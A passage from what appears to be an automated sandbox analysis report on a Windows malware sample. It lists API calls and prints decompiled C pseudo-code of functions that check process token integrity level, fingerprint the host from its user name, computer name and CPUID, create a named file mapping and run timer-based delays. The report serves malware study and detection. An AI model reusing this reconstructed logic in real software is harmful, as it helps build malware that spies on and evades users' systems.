                                                          • memcpy.NTDLL(74B069A0,04478D93,00000002,00000000,004F0053,74B069A0,?,?,04478D93,004F0053,0501935C), ref: 04474610
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                          • lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E04C05A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E04C0A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E04C0A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}




















                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04C05A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04C05A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C05A9D
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C05ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04C05AC7
                                                          • NtClose.NTDLL(?), ref: 04C05AD9
                                                          • NtClose.NTDLL(00000000), ref: 04C05AE3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E04C051B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x4c0d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L04C0AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x4c0d26c; // 0x31c
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x4c0d24c = 5;
                                                          						} else {
                                                          							_t68 = E04C08D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x4c0d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E04C0A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E04C036B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x4c0d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x4c0d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E04C06761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x4c0d248);
                                                          								L21:
                                                          								L04C0AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x4c0d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}


                                                          APIs
                                                          • memset.NTDLL ref: 04C051C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04C051D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04C051F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04C05212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C0522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C052C1
                                                          • CloseHandle.KERNEL32(?), ref: 04C052D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04C0530A
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04C05D5E,?), ref: 04C05320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C0532B
                                                            • Part of subcall function 04C08D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068893A0,?,00000000,30314549,00000014,004F0053,0688935C), ref: 04C08E00
                                                            • Part of subcall function 04C08D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C0523E), ref: 04C08E12
                                                          • GetLastError.KERNEL32 ref: 04C0533D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: caf133e4c2299030557cec8b441697818c5c228a7b530c42daad7e5bebdaecf8
                                                          • Instruction ID: 33d65d8911929edfa86845aeac4393dcb44eb36e600a342fb89b639753ff22ba
                                                          • Opcode Fuzzy Hash: caf133e4c2299030557cec8b441697818c5c228a7b530c42daad7e5bebdaecf8
                                                          • Instruction Fuzzy Hash: B6514EB5901228BBDF11DFD5DC44AEEBFBAEF49724F208615F411A2190D774AA80DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04C0232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L04C0AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t5 = _t13 + 0x4c0e87e; // 0x6888e26
                                                          				_t6 = _t13 + 0x4c0e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L04C0ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x4c0d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}


                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53,?,?), ref: 04C0233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04C02351
                                                          • _snwprintf.NTDLL ref: 04C02376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,04C0D2AC,00000004,00000000,00001000,?), ref: 04C02392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53), ref: 04C023A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04C023BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?), ref: 04C023DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53), ref: 04C023E4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 47b3b4e0891293233657c352919174f56b8726572e09da6bf0fe1960622b5981
                                                          • Instruction ID: 05e13cfb203c1e3eb0b96abae10807e6ad56206643fb57fdb5ffec640435af2f
                                                          • Opcode Fuzzy Hash: 47b3b4e0891293233657c352919174f56b8726572e09da6bf0fe1960622b5981
                                                          • Instruction Fuzzy Hash: 81210276640204BBDB11ABA8DC09F9E77AEEB48704F168261F605E71C0E670EE44CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E04C09135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x4c0d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E04C0A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x4c0d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x4c0d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E04C07306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x4c0d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x4c0d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04C07306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x4c0d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C0916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C09183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C09190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04C05D20), ref: 04C091B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C091D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04C091EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C091F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04C05D20), ref: 04C09217
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: ce598865ed0e927223eb2de877135ed8c76f07b8338b6d80ffd91b380bae59e5
                                                          • Instruction ID: 4183421d9de9672e9cf0db4682369566ad73b916ed641f9462bb65666c0bc4c3
                                                          • Opcode Fuzzy Hash: ce598865ed0e927223eb2de877135ed8c76f07b8338b6d80ffd91b380bae59e5
                                                          • Instruction Fuzzy Hash: C0313AB6A00205EFEB10DFA9DC85BAEB7FAEF44304F128469E505D7291D734EE419B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C01A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x4c0d25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E04C0A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E04C0A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04C01A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04C01A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04C01A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04C01ABA
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04C01A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04C01A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04C01AA5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: dcd7432b5eb6ecc8583d5ec75f862386d897be3c8fdd8a560413ea4c63558756
                                                          • Instruction ID: c071edcde42d1d53a71627917a0370d8a8a9f4e29b6f0db7b8a4ce4f32a386e0
                                                          • Opcode Fuzzy Hash: dcd7432b5eb6ecc8583d5ec75f862386d897be3c8fdd8a560413ea4c63558756
                                                          • Instruction Fuzzy Hash: 48215C79900248FFEB00DF94DC84EAEBBBAEB44304F0481A6E901A6191C7759F45EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04C012E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x4c0d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x4c0d1a8 = GetTickCount();
                                                          					_t12 = E04C03E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L04C0B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E04C05548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E04C04DA2(_t25) != 0) {
                                                          							 *0x4c0d260 = 1; // executed
                                                          						}
                                                          						_t12 = E04C05BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C012F8
                                                          • GetTickCount.KERNEL32 ref: 04C0130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04C04EF2,?), ref: 04C01328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C0132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04C0134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C01365
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 0d0582d6b498fecaf15d5c07ccbce60d4ead5a0c8753f2a8e92d0a9e3209614e
                                                          • Instruction ID: f40082ccb4ada4c4b14d37fa052ec940093895b7baf70182ff248578f00608a7
                                                          • Opcode Fuzzy Hash: 0d0582d6b498fecaf15d5c07ccbce60d4ead5a0c8753f2a8e92d0a9e3209614e
                                                          • Instruction Fuzzy Hash: 8411087AA44300BFF314ABA4DC09B6A7B9AEB44758F058615FA85C62C0EE74FD40D660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E04C05BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E04C06C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x4c0d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x4c0d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x4c0d160(0, 2); // executed
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E04C0496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					if( *0x4c0d25c > 5) {
                                                          						_t8 = _t26 + 0x4c0e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x4c0e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E04C0729A(_t27, _t27);
                                                          					_t31 = E04C0232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x4c0d270 =  *0x4c0d270 ^ 0x81bbe65d;
                                                          						_t32 = E04C0A71F(0x60);
                                                          						 *0x4c0d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x4c0d32c; // 0x68895b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x4c0d32c; // 0x68895b0
                                                          							 *_t51 = 0x4c0e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x4c0d238, 0, 0x43);
                                                          							 *0x4c0d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x4c0d25c; // 0x4000000a
